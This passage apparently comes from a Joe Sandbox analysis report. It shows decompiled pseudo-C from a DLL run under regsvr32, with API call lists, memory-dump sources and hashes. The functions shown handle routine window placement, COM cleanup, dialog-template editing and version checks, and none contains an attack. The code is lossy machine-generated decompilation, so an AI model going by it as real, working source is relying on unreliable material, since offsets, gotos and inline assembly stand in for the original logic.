                                                                                                            					_t121 =  *((intOrPtr*)(__ecx + 0x50));
                                                                                                            					if(_t121 != 0) {
                                                                                                            						_t122 =  *_t121;
                                                                                                            						_push(_t170 - 0x14);
                                                                                                            						_push(0x10043208);
                                                                                                            						_push(_t122);
                                                                                                            						if( *((intOrPtr*)( *_t122))() >= 0) {
                                                                                                            							_t124 =  *((intOrPtr*)(_t170 - 0x14));
                                                                                                            							_push(_t170 - 0x10);
                                                                                                            							_push(0x10043348);
                                                                                                            							 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                                                            							_push(_t124);
                                                                                                            							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
                                                                                                            								_t128 =  *((intOrPtr*)(_t170 - 0x10));
                                                                                                            								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
                                                                                                            								_t130 =  *((intOrPtr*)(_t170 - 0x10));
                                                                                                            								 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                                                                            							}
                                                                                                            							_t126 =  *((intOrPtr*)(_t170 - 0x14));
                                                                                                            							 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_push(_t161);
                                                                                                            				L8:
                                                                                                            				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
                                                                                                            					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
                                                                                                            					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
                                                                                                            				E1001E047(_t167 + 0x18);
                                                                                                            				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
                                                                                                            					L16:
                                                                                                            					_t87 =  *((intOrPtr*)(_t167 + 8));
                                                                                                            					if(_t87 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t87 + 8))(_t87);
                                                                                                            					}
                                                                                                            					_t88 =  *((intOrPtr*)(_t167 + 0xc));
                                                                                                            					if(_t88 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
                                                                                                            						L29:
                                                                                                            						_t89 =  *((intOrPtr*)(_t167 + 0x34));
                                                                                                            						if(_t89 != 0) {
                                                                                                            							__imp__CoTaskMemFree(_t89);
                                                                                                            						}
                                                                                                            						_t138 =  *((intOrPtr*)(_t167 + 0x54));
                                                                                                            						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
                                                                                                            							E1000DA8C(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
                                                                                                            							E10009EC5( *((intOrPtr*)(_t167 + 0x54)));
                                                                                                            						}
                                                                                                            						_t162 =  *((intOrPtr*)(_t167 + 0x54));
                                                                                                            						_t195 = _t162;
                                                                                                            						if(_t162 != 0) {
                                                                                                            							E10009EC5(_t162);
                                                                                                            							_push(_t162);
                                                                                                            							L1001F7A9(0, _t162, _t167, _t195);
                                                                                                            						}
                                                                                                            						_t163 =  *((intOrPtr*)(_t167 + 0x50));
                                                                                                            						_t196 = _t163;
                                                                                                            						if(_t163 != 0) {
                                                                                                            							E1000E731(_t163, _t196);
                                                                                                            							_push(_t163);
                                                                                                            							L1001F7A9(0, _t163, _t167, _t196);
                                                                                                            						}
                                                                                                            						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
                                                                                                            						if(_t90 != 0) {
                                                                                                            							 *((intOrPtr*)( *_t90 + 8))(_t90);
                                                                                                            						}
                                                                                                            						_t168 =  *((intOrPtr*)(_t167 + 0x48));
                                                                                                            						if(_t168 != 0) {
                                                                                                            							 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                                                            						}
                                                                                                            						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
                                                                                                            						_t91 = E1001E10D( *((intOrPtr*)(_t170 - 0x18)));
                                                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
                                                                                                            						return _t91;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                                                            						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
                                                                                                            							L28:
                                                                                                            							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
                                                                                                            							goto L29;
                                                                                                            						}
                                                                                                            						_t165 = 0;
                                                                                                            						do {
                                                                                                            							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
                                                                                                            							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
                                                                                                            							if(_t104 == 0) {
                                                                                                            								goto L25;
                                                                                                            							} else {
                                                                                                            								goto L24;
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								L24:
                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(E10006D96(_t170 - 0x14))) + 0x94)) = 0;
                                                                                                            							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
                                                                                                            							L25:
                                                                                                            							E1001E047( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
                                                                                                            							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
                                                                                                            							if(_t148 != 0) {
                                                                                                            								 *((intOrPtr*)( *_t148 + 4))(1);
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
                                                                                                            							_t165 = _t165 + 0x28;
                                                                                                            						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
                                                                                                            						goto L28;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t161 = 0;
                                                                                                            				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
                                                                                                            					L14:
                                                                                                            					if(_t183 != 0) {
                                                                                                            						_push( *((intOrPtr*)(_t167 + 0x3c)));
                                                                                                            						L1001F7A9(0, _t161, _t167, _t183);
                                                                                                            						_push( *((intOrPtr*)(_t167 + 0x40)));
                                                                                                            						L1001F7A9(0, _t161, _t167, _t183);
                                                                                                            					}
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                                                            				do {
                                                                                                            					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
                                                                                                            					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
                                                                                                            					_t161 = _t161 + 1;
                                                                                                            				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
                                                                                                            				_t183 =  *((intOrPtr*)(_t167 + 0x38));
                                                                                                            				goto L14;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$ClearH_prologVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 82050969-0
                                                                                                            • Opcode ID: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction ID: 43d2ea8d123215d3b84d8545f0b19a771d1917bb58f1b2237b0c9da6e0f617ce
                                                                                                            • Opcode Fuzzy Hash: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction Fuzzy Hash: 3E712675A00682DFDB24CFA4C9C486AB7F5FF49380715486DE156AB665CB30FC81CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1000E58F(void* __ecx, void* __edx) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				struct tagRECT _v40;
                                                                                                            				struct tagRECT _v56;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t58;
                                                                                                            				intOrPtr _t60;
                                                                                                            				intOrPtr* _t62;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				intOrPtr _t66;
                                                                                                            				intOrPtr* _t67;
                                                                                                            				intOrPtr* _t69;
                                                                                                            				intOrPtr* _t71;
                                                                                                            				intOrPtr* _t73;
                                                                                                            				intOrPtr* _t84;
                                                                                                            				void* _t107;
                                                                                                            				void* _t126;
                                                                                                            				intOrPtr _t130;
                                                                                                            				intOrPtr* _t131;
                                                                                                            				intOrPtr* _t133;
                                                                                                            				intOrPtr* _t134;
                                                                                                            				void* _t135;
                                                                                                            				intOrPtr _t136;
                                                                                                            				void* _t137;
                                                                                                            
                                                                                                            				_t126 = __edx;
                                                                                                            				_t135 = __ecx;
                                                                                                            				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
                                                                                                            				_v12 = _t130;
                                                                                                            				_t58 = IsWindowVisible( *(_t130 + 0x1c));
                                                                                                            				asm("sbb eax, eax");
                                                                                                            				_t60 =  ~_t58 + 1;
                                                                                                            				_v24 = _t60;
                                                                                                            				_t107 = 0;
                                                                                                            				if(_t60 != 0) {
                                                                                                            					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
                                                                                                            					GetWindowRect( *(_t130 + 0x1c),  &_v40);
                                                                                                            					asm("cdq");
                                                                                                            					asm("cdq");
                                                                                                            					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
                                                                                                            					E100203AD(_t130, 1);
                                                                                                            				}
                                                                                                            				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                                                            				_t131 = _t135 + 0x48;
                                                                                                            				_push(_t131);
                                                                                                            				_push(0x100405f8);
                                                                                                            				_push(_t62);
                                                                                                            				if( *((intOrPtr*)( *_t62))() < 0) {
                                                                                                            					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                                                            					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
                                                                                                            					if(_t66 >= _t107) {
                                                                                                            						_t67 = _v16;
                                                                                                            						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
                                                                                                            						_t69 = _v16;
                                                                                                            						 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                                                            						_t71 = _v20;
                                                                                                            						if(_t71 != _t107) {
                                                                                                            							_t133 = _t135 + 8;
                                                                                                            							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
                                                                                                            							_t73 = _v20;
                                                                                                            							 *((intOrPtr*)( *_t73 + 8))(_t73);
                                                                                                            							_t66 = _v8;
                                                                                                            							if(_t66 >= _t107) {
                                                                                                            								_t134 =  *_t133;
                                                                                                            								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t66 = 0x80004005;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t84 =  *_t131;
                                                                                                            					_t134 = _t135 + 0x4c;
                                                                                                            					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
                                                                                                            					if( *_t134 == _t107) {
                                                                                                            						_v8 = 0x80004003;
                                                                                                            					}
                                                                                                            					if(_v8 >= _t107) {
                                                                                                            						L14:
                                                                                                            						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
                                                                                                            						if(_v24 != _t107) {
                                                                                                            							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                                                            							E100203AD(_v12, _t107);
                                                                                                            						}
                                                                                                            						_t66 = _t136;
                                                                                                            					} else {
                                                                                                            						if(_v24 != _t107) {
                                                                                                            							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                                                            							E100203AD(_v12, _t107);
                                                                                                            						}
                                                                                                            						_t66 = _v8;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t66;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 1000E5AD
                                                                                                            • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                                                            • GetWindowRect.USER32 ref: 1000E5D3
                                                                                                            • GetWindowRect.USER32 ref: 1000E5E0
                                                                                                              • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                                                              • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$DesktopMoveShowVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3835705305-0
                                                                                                            • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                                                            • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				struct tagRECT _v28;
                                                                                                            				struct tagRECT _v44;
                                                                                                            				struct tagRECT _v60;
                                                                                                            				void* _t76;
                                                                                                            				int _t78;
                                                                                                            				intOrPtr _t83;
                                                                                                            				intOrPtr _t102;
                                                                                                            				int _t116;
                                                                                                            				void* _t124;
                                                                                                            				void* _t128;
                                                                                                            				intOrPtr _t133;
                                                                                                            				void* _t135;
                                                                                                            				void* _t139;
                                                                                                            
                                                                                                            				_t135 = __edi;
                                                                                                            				_t124 = __ecx;
                                                                                                            				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                            				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                            				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                                                            				_t139 = 2;
                                                                                                            				if(_t133 == 0xa) {
                                                                                                            					L7:
                                                                                                            					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
                                                                                                            					L9:
                                                                                                            					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
                                                                                                            					__eflags = _t78;
                                                                                                            					L10:
                                                                                                            					if(_t78 < 0) {
                                                                                                            						_t78 = 0;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
                                                                                                            					GetWindowRect(GetDesktopWindow(),  &_v44);
                                                                                                            					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					if(_t83 == 0xa || _t83 == 0xc) {
                                                                                                            						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
                                                                                                            						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
                                                                                                            						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                            						if(__eflags != 0) {
                                                                                                            							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
                                                                                                            							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
                                                                                                            							__eflags = _t102;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
                                                                                                            							 *(_t124 + 0x48) = _v28.left;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
                                                                                                            						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
                                                                                                            						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                            						_t149 = _t116;
                                                                                                            						if(_t116 != 0) {
                                                                                                            							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t124 + 4)) = _a4;
                                                                                                            					 *((intOrPtr*)(_t124 + 8)) = _a8;
                                                                                                            					return E10030582(_t124, _t149, 0);
                                                                                                            				}
                                                                                                            				if(_t133 == 0xb) {
                                                                                                            					__eflags = _t133 - 0xa;
                                                                                                            					if(_t133 != 0xa) {
                                                                                                            						_t14 = __ecx + 0x30;
                                                                                                            						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
                                                                                                            						__eflags =  *_t14;
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					goto L7;
                                                                                                            				} else {
                                                                                                            					_t139 = 0x22;
                                                                                                            					if(_t133 != 0xc) {
                                                                                                            						_t8 = __ecx + 0x34;
                                                                                                            						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
                                                                                                            						__eflags =  *_t8;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
                                                                                                            					}
                                                                                                            					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            			}



















                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$IntersectWindow$Desktop
                                                                                                            • String ID:
                                                                                                            • API String ID: 123605412-0
                                                                                                            • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
                                                                                                            • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				short _v72;
                                                                                                            				signed int _v76;
                                                                                                            				signed int _v80;
                                                                                                            				void** _v84;
                                                                                                            				signed int _v88;
                                                                                                            				intOrPtr _t52;
                                                                                                            				short* _t65;
                                                                                                            				void* _t74;
                                                                                                            				short* _t81;
                                                                                                            				void* _t86;
                                                                                                            				char* _t92;
                                                                                                            				signed int _t93;
                                                                                                            				signed int* _t95;
                                                                                                            				void** _t96;
                                                                                                            				signed int _t101;
                                                                                                            				signed int _t103;
                                                                                                            				void* _t106;
                                                                                                            
                                                                                                            				_t52 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t52;
                                                                                                            				_v84 = __ecx;
                                                                                                            				if(__ecx[1] != 0) {
                                                                                                            					_t95 = GlobalLock( *__ecx);
                                                                                                            					_v80 = 0 | _t95[0] == 0x0000ffff;
                                                                                                            					_v76 = E100246AB(_t95);
                                                                                                            					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
                                                                                                            					_v88 = _t101;
                                                                                                            					if(_v80 == 0) {
                                                                                                            						 *_t95 =  *_t95 | 0x00000040;
                                                                                                            					} else {
                                                                                                            						_t95[3] = _t95[3] | 0x00000040;
                                                                                                            					}
                                                                                                            					if(lstrlenA(_a4) < 0x20) {
                                                                                                            						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                            						_t65 = E1002472A(_t95);
                                                                                                            						_t86 = 0;
                                                                                                            						_t81 = _t65;
                                                                                                            						if(_v76 != 0) {
                                                                                                            							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
                                                                                                            						}
                                                                                                            						_t92 = _a4;
                                                                                                            						_t31 = _t81 + 3; // 0x3
                                                                                                            						_t33 = _t92 + 3; // 0x3
                                                                                                            						_t67 = _t86 + _t31 & 0xfffffffc;
                                                                                                            						_t103 = _t81 + _t33 & 0xfffffffc;
                                                                                                            						_v76 = _t86 + _t31 & 0xfffffffc;
                                                                                                            						if(_v80 == 0) {
                                                                                                            							_t93 = _t95[2];
                                                                                                            						} else {
                                                                                                            							_t93 = _t95[4];
                                                                                                            						}
                                                                                                            						if(_a4 != _t86 && _t93 > 0) {
                                                                                                            							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
                                                                                                            							_t106 = _t106 + 0xc;
                                                                                                            						}
                                                                                                            						 *_t81 = _a8;
                                                                                                            						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
                                                                                                            						_t96 = _v84;
                                                                                                            						_t96[1] = _t96[1] + _t103 - _v76;
                                                                                                            						GlobalUnlock( *_t96);
                                                                                                            						_t96[2] = _t96[2] & 0x00000000;
                                                                                                            						_t74 = 1;
                                                                                                            					} else {
                                                                                                            						_t74 = 0;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t74 = 0;
                                                                                                            				}
                                                                                                            				return E100117AE(_t74, _v8);
                                                                                                            			}

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLocklstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1144527523-0
                                                                                                            • Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
                                                                                                            • Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                                                            • Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
                                                                                                            				void* _v8;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				long* _t9;
                                                                                                            				long* _t11;
                                                                                                            				long _t17;
                                                                                                            				signed int _t25;
                                                                                                            				long* _t33;
                                                                                                            				long* _t36;
                                                                                                            				long* _t38;
                                                                                                            				long* _t39;
                                                                                                            				long _t47;
                                                                                                            				long _t50;
                                                                                                            				void* _t52;
                                                                                                            				long* _t53;
                                                                                                            				struct _OSVERSIONINFOA* _t54;
                                                                                                            				signed int _t56;
                                                                                                            				struct _OSVERSIONINFOA* _t58;
                                                                                                            
                                                                                                            				_t9 = _a8;
                                                                                                            				if(_t9 != 1) {
                                                                                                            					__eflags = _t9;
                                                                                                            					if(_t9 != 0) {
                                                                                                            						__eflags = _t9 - 2;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							__eflags = _t9 - 3;
                                                                                                            							if(_t9 == 3) {
                                                                                                            								E10015355(0);
                                                                                                            							}
                                                                                                            							L27:
                                                                                                            							_t11 = 1;
                                                                                                            							__eflags = 1;
                                                                                                            							L28:
                                                                                                            							return _t11;
                                                                                                            						}
                                                                                                            						_push(0x8c);
                                                                                                            						_push(1);
                                                                                                            						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
                                                                                                            						__eflags = _t53;
                                                                                                            						if(_t53 == 0) {
                                                                                                            							L24:
                                                                                                            							_t11 = 0;
                                                                                                            							goto L28;
                                                                                                            						}
                                                                                                            						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
                                                                                                            						_push(_t53);
                                                                                                            						if(__eflags == 0) {
                                                                                                            							E100107C8(__ebx, __edi, _t53, __eflags);
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						E1001518A();
                                                                                                            						_t17 = GetCurrentThreadId();
                                                                                                            						_t53[1] = _t53[1] | 0xffffffff;
                                                                                                            						 *_t53 = _t17;
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            					__eflags =  *0x1004f3c8 - _t9; // 0x0
                                                                                                            					if(__eflags <= 0) {
                                                                                                            						goto L24;
                                                                                                            					}
                                                                                                            					 *0x1004f3c8 =  *0x1004f3c8 - 1;
                                                                                                            					__eflags =  *0x1004f41c - _t9; // 0x1
                                                                                                            					if(__eflags == 0) {
                                                                                                            						E10011F67();
                                                                                                            					}
                                                                                                            					E1001634A();
                                                                                                            					E1001516D();
                                                                                                            					E10013AD4();
                                                                                                            					goto L27;
                                                                                                            				}
                                                                                                            				E10010B20(0x94, __ecx);
                                                                                                            				_t54 = _t58;
                                                                                                            				_t54->dwOSVersionInfoSize = 0x94;
                                                                                                            				if(GetVersionExA(_t54) == 0) {
                                                                                                            					goto L24;
                                                                                                            				}
                                                                                                            				_t47 = _t54->dwPlatformId;
                                                                                                            				 *0x1004f3e0 = _t47;
                                                                                                            				_t25 = _t54->dwMajorVersion;
                                                                                                            				 *0x1004f3ec = _t25;
